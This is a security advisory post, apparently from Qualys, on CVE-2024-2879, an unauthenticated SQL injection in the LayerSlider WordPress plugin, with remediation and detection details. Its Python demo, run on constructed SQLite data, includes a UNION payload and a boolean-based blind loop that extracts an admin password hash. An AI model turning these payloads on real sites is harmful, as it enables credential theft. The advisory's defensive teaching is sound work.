WordPress LayerSlider Plugin Encountered SQL Injection Vulnerability
On March 25, 2024, an unauthenticated SQL injection vulnerability, tracked as CVE-2024-2879, was reported in the LayerSlider plugin for WordPress. It falls under the OWASP Top 10 Injection category (A03:2021) and poses a serious threat to WordPress sites running the affected plugin versions.
The SQL injection arises from insufficient escaping of a user-supplied parameter and a lack of preparation (parameterization) of the existing SQL query: the affected plugin function builds the query from request input without validating its type or binding it as a parameter, so the input is interpreted as SQL.
The vulnerability affects LayerSlider versions 7.9.11 through 7.10.0. Because the vulnerable request path requires no authentication, unauthenticated attackers can append additional SQL to the existing query and use it to extract sensitive information, such as password hashes, from the database.
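To make the flaw class concrete, the following Python script is an added example and is not LayerSlider's, Wordfence's or Qualys's code. It models the vulnerable pattern (a request parameter concatenated into the SQL text) beside the hardened pattern (type enforcement plus a bound parameter, the equivalent of `absint()` and `$wpdb->prepare()` in WordPress) against an in-memory SQLite database with a constructed schema, constructed table and column names, and a made-up password hash. It also shows how an unauthenticated attacker turns such a bug into a boolean-based blind extraction of a password hash, one character per request; a time-based blind variant works the same way with a delay rather than a row/no-row response as the oracle.

```python
import re
import sqlite3

# Constructed sample data: a plugin table keyed by an integer id and the
# WordPress users table an attacker would target. The hash is made up.
SAMPLE_HASH = "$P$Bx7a"  # constructed, not a real phpass hash


def make_db() -> sqlite3.Connection:
    """Build the in-memory sample database (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        f"""
        CREATE TABLE popups (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO popups VALUES (1, 'Homepage popup'), (2, 'Promo');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '{SAMPLE_HASH}');
        """
    )
    return conn


def popup_name_vulnerable(conn: sqlite3.Connection, popup_id: str) -> list:
    # The flaw class behind CVE-2024-2879: the request parameter is dropped
    # straight into the SQL text, so any SQL the attacker appends is executed.
    sql = f"SELECT name FROM popups WHERE id = {popup_id}"
    return [row[0] for row in conn.execute(sql)]


def popup_name_fixed(conn: sqlite3.Connection, popup_id: str) -> list:
    # Hardened form: enforce the expected type (WordPress: absint()) and bind
    # the value as a parameter (WordPress: $wpdb->prepare()), so the database
    # never sees attacker-controlled SQL syntax.
    if not re.fullmatch(r"[0-9]+", popup_id):
        return []
    sql = "SELECT name FROM popups WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(popup_id),))]


# Alphabet of a phpass hash ($P$ prefix plus ./0-9A-Za-z); SQLite compares
# TEXT case-sensitively by default, which the character-by-character oracle
# relies on.
CHARSET = "$./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def blind_extract_hash(oracle, max_len: int = 34) -> str:
    """Recover wp_users.user_pass for ID 1 through a boolean oracle.

    oracle(payload) must return True when the injected condition holds (the
    popup row comes back) and False otherwise. Each character costs at most
    len(CHARSET) requests; a time-based variant would replace the row/no-row
    signal with a measurable delay.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = (
                f"1 AND (SELECT substr(user_pass, {pos}, 1) "
                f"FROM wp_users WHERE ID = 1) = '{ch}'"
            )
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of the stored string
    return recovered


def demo() -> dict:
    """Run the same payloads against the vulnerable and the fixed lookup."""
    conn = make_db()
    union = "1 UNION SELECT user_pass FROM wp_users"
    return {
        "vulnerable_union": sorted(popup_name_vulnerable(conn, union)),
        "fixed_union": popup_name_fixed(conn, union),
        "fixed_legit": popup_name_fixed(conn, "1"),
        "blind_vulnerable": blind_extract_hash(
            lambda p: bool(popup_name_vulnerable(conn, p))),
        "blind_fixed": blind_extract_hash(
            lambda p: bool(popup_name_fixed(conn, p))),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Against the vulnerable lookup the UNION payload returns the admin hash alongside the popup name and the blind loop recovers the whole hash; against the fixed lookup both payloads are rejected before any SQL runs, and the legitimate id still works. The point for remediation is that escaping alone is not the fix: the parameter has to be typed and bound, which is what the patched plugin version's prepared query does.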
To address this issue, the LayerSlider developers released version 7.10.1, which fixes CVE-2024-2879. Customers are advised to upgrade to LayerSlider 7.10.1 or a later version to remediate the vulnerability. (QID 150868 is the Qualys detection for this issue, not a vendor update.)
For more details about CVE-2024-2879, you can refer to the National Vulnerability Database at https://nvd.nist.gov/vuln/detail/CVE-2024-2879. Additional information about the vulnerability can be found on the Wordfence blog at https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/.
The Wordfence Threat Intelligence entry for the vulnerability is at https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/layerslider/layerslider-7911-7100-unauthenticated-sql-injection. The Qualys QID for this issue is titled: WordPress LayerSlider Plugin: Unauthenticated SQL Injection Vulnerability (CVE-2024-2879).
Contributor: Sheela Sarva, Director of Web Application Security, Qualys.
Customers can detect CVE-2024-2879 with Qualys Web Application Scanning using QID 150868. For details of the fixed version, refer to the LayerSlider release logs.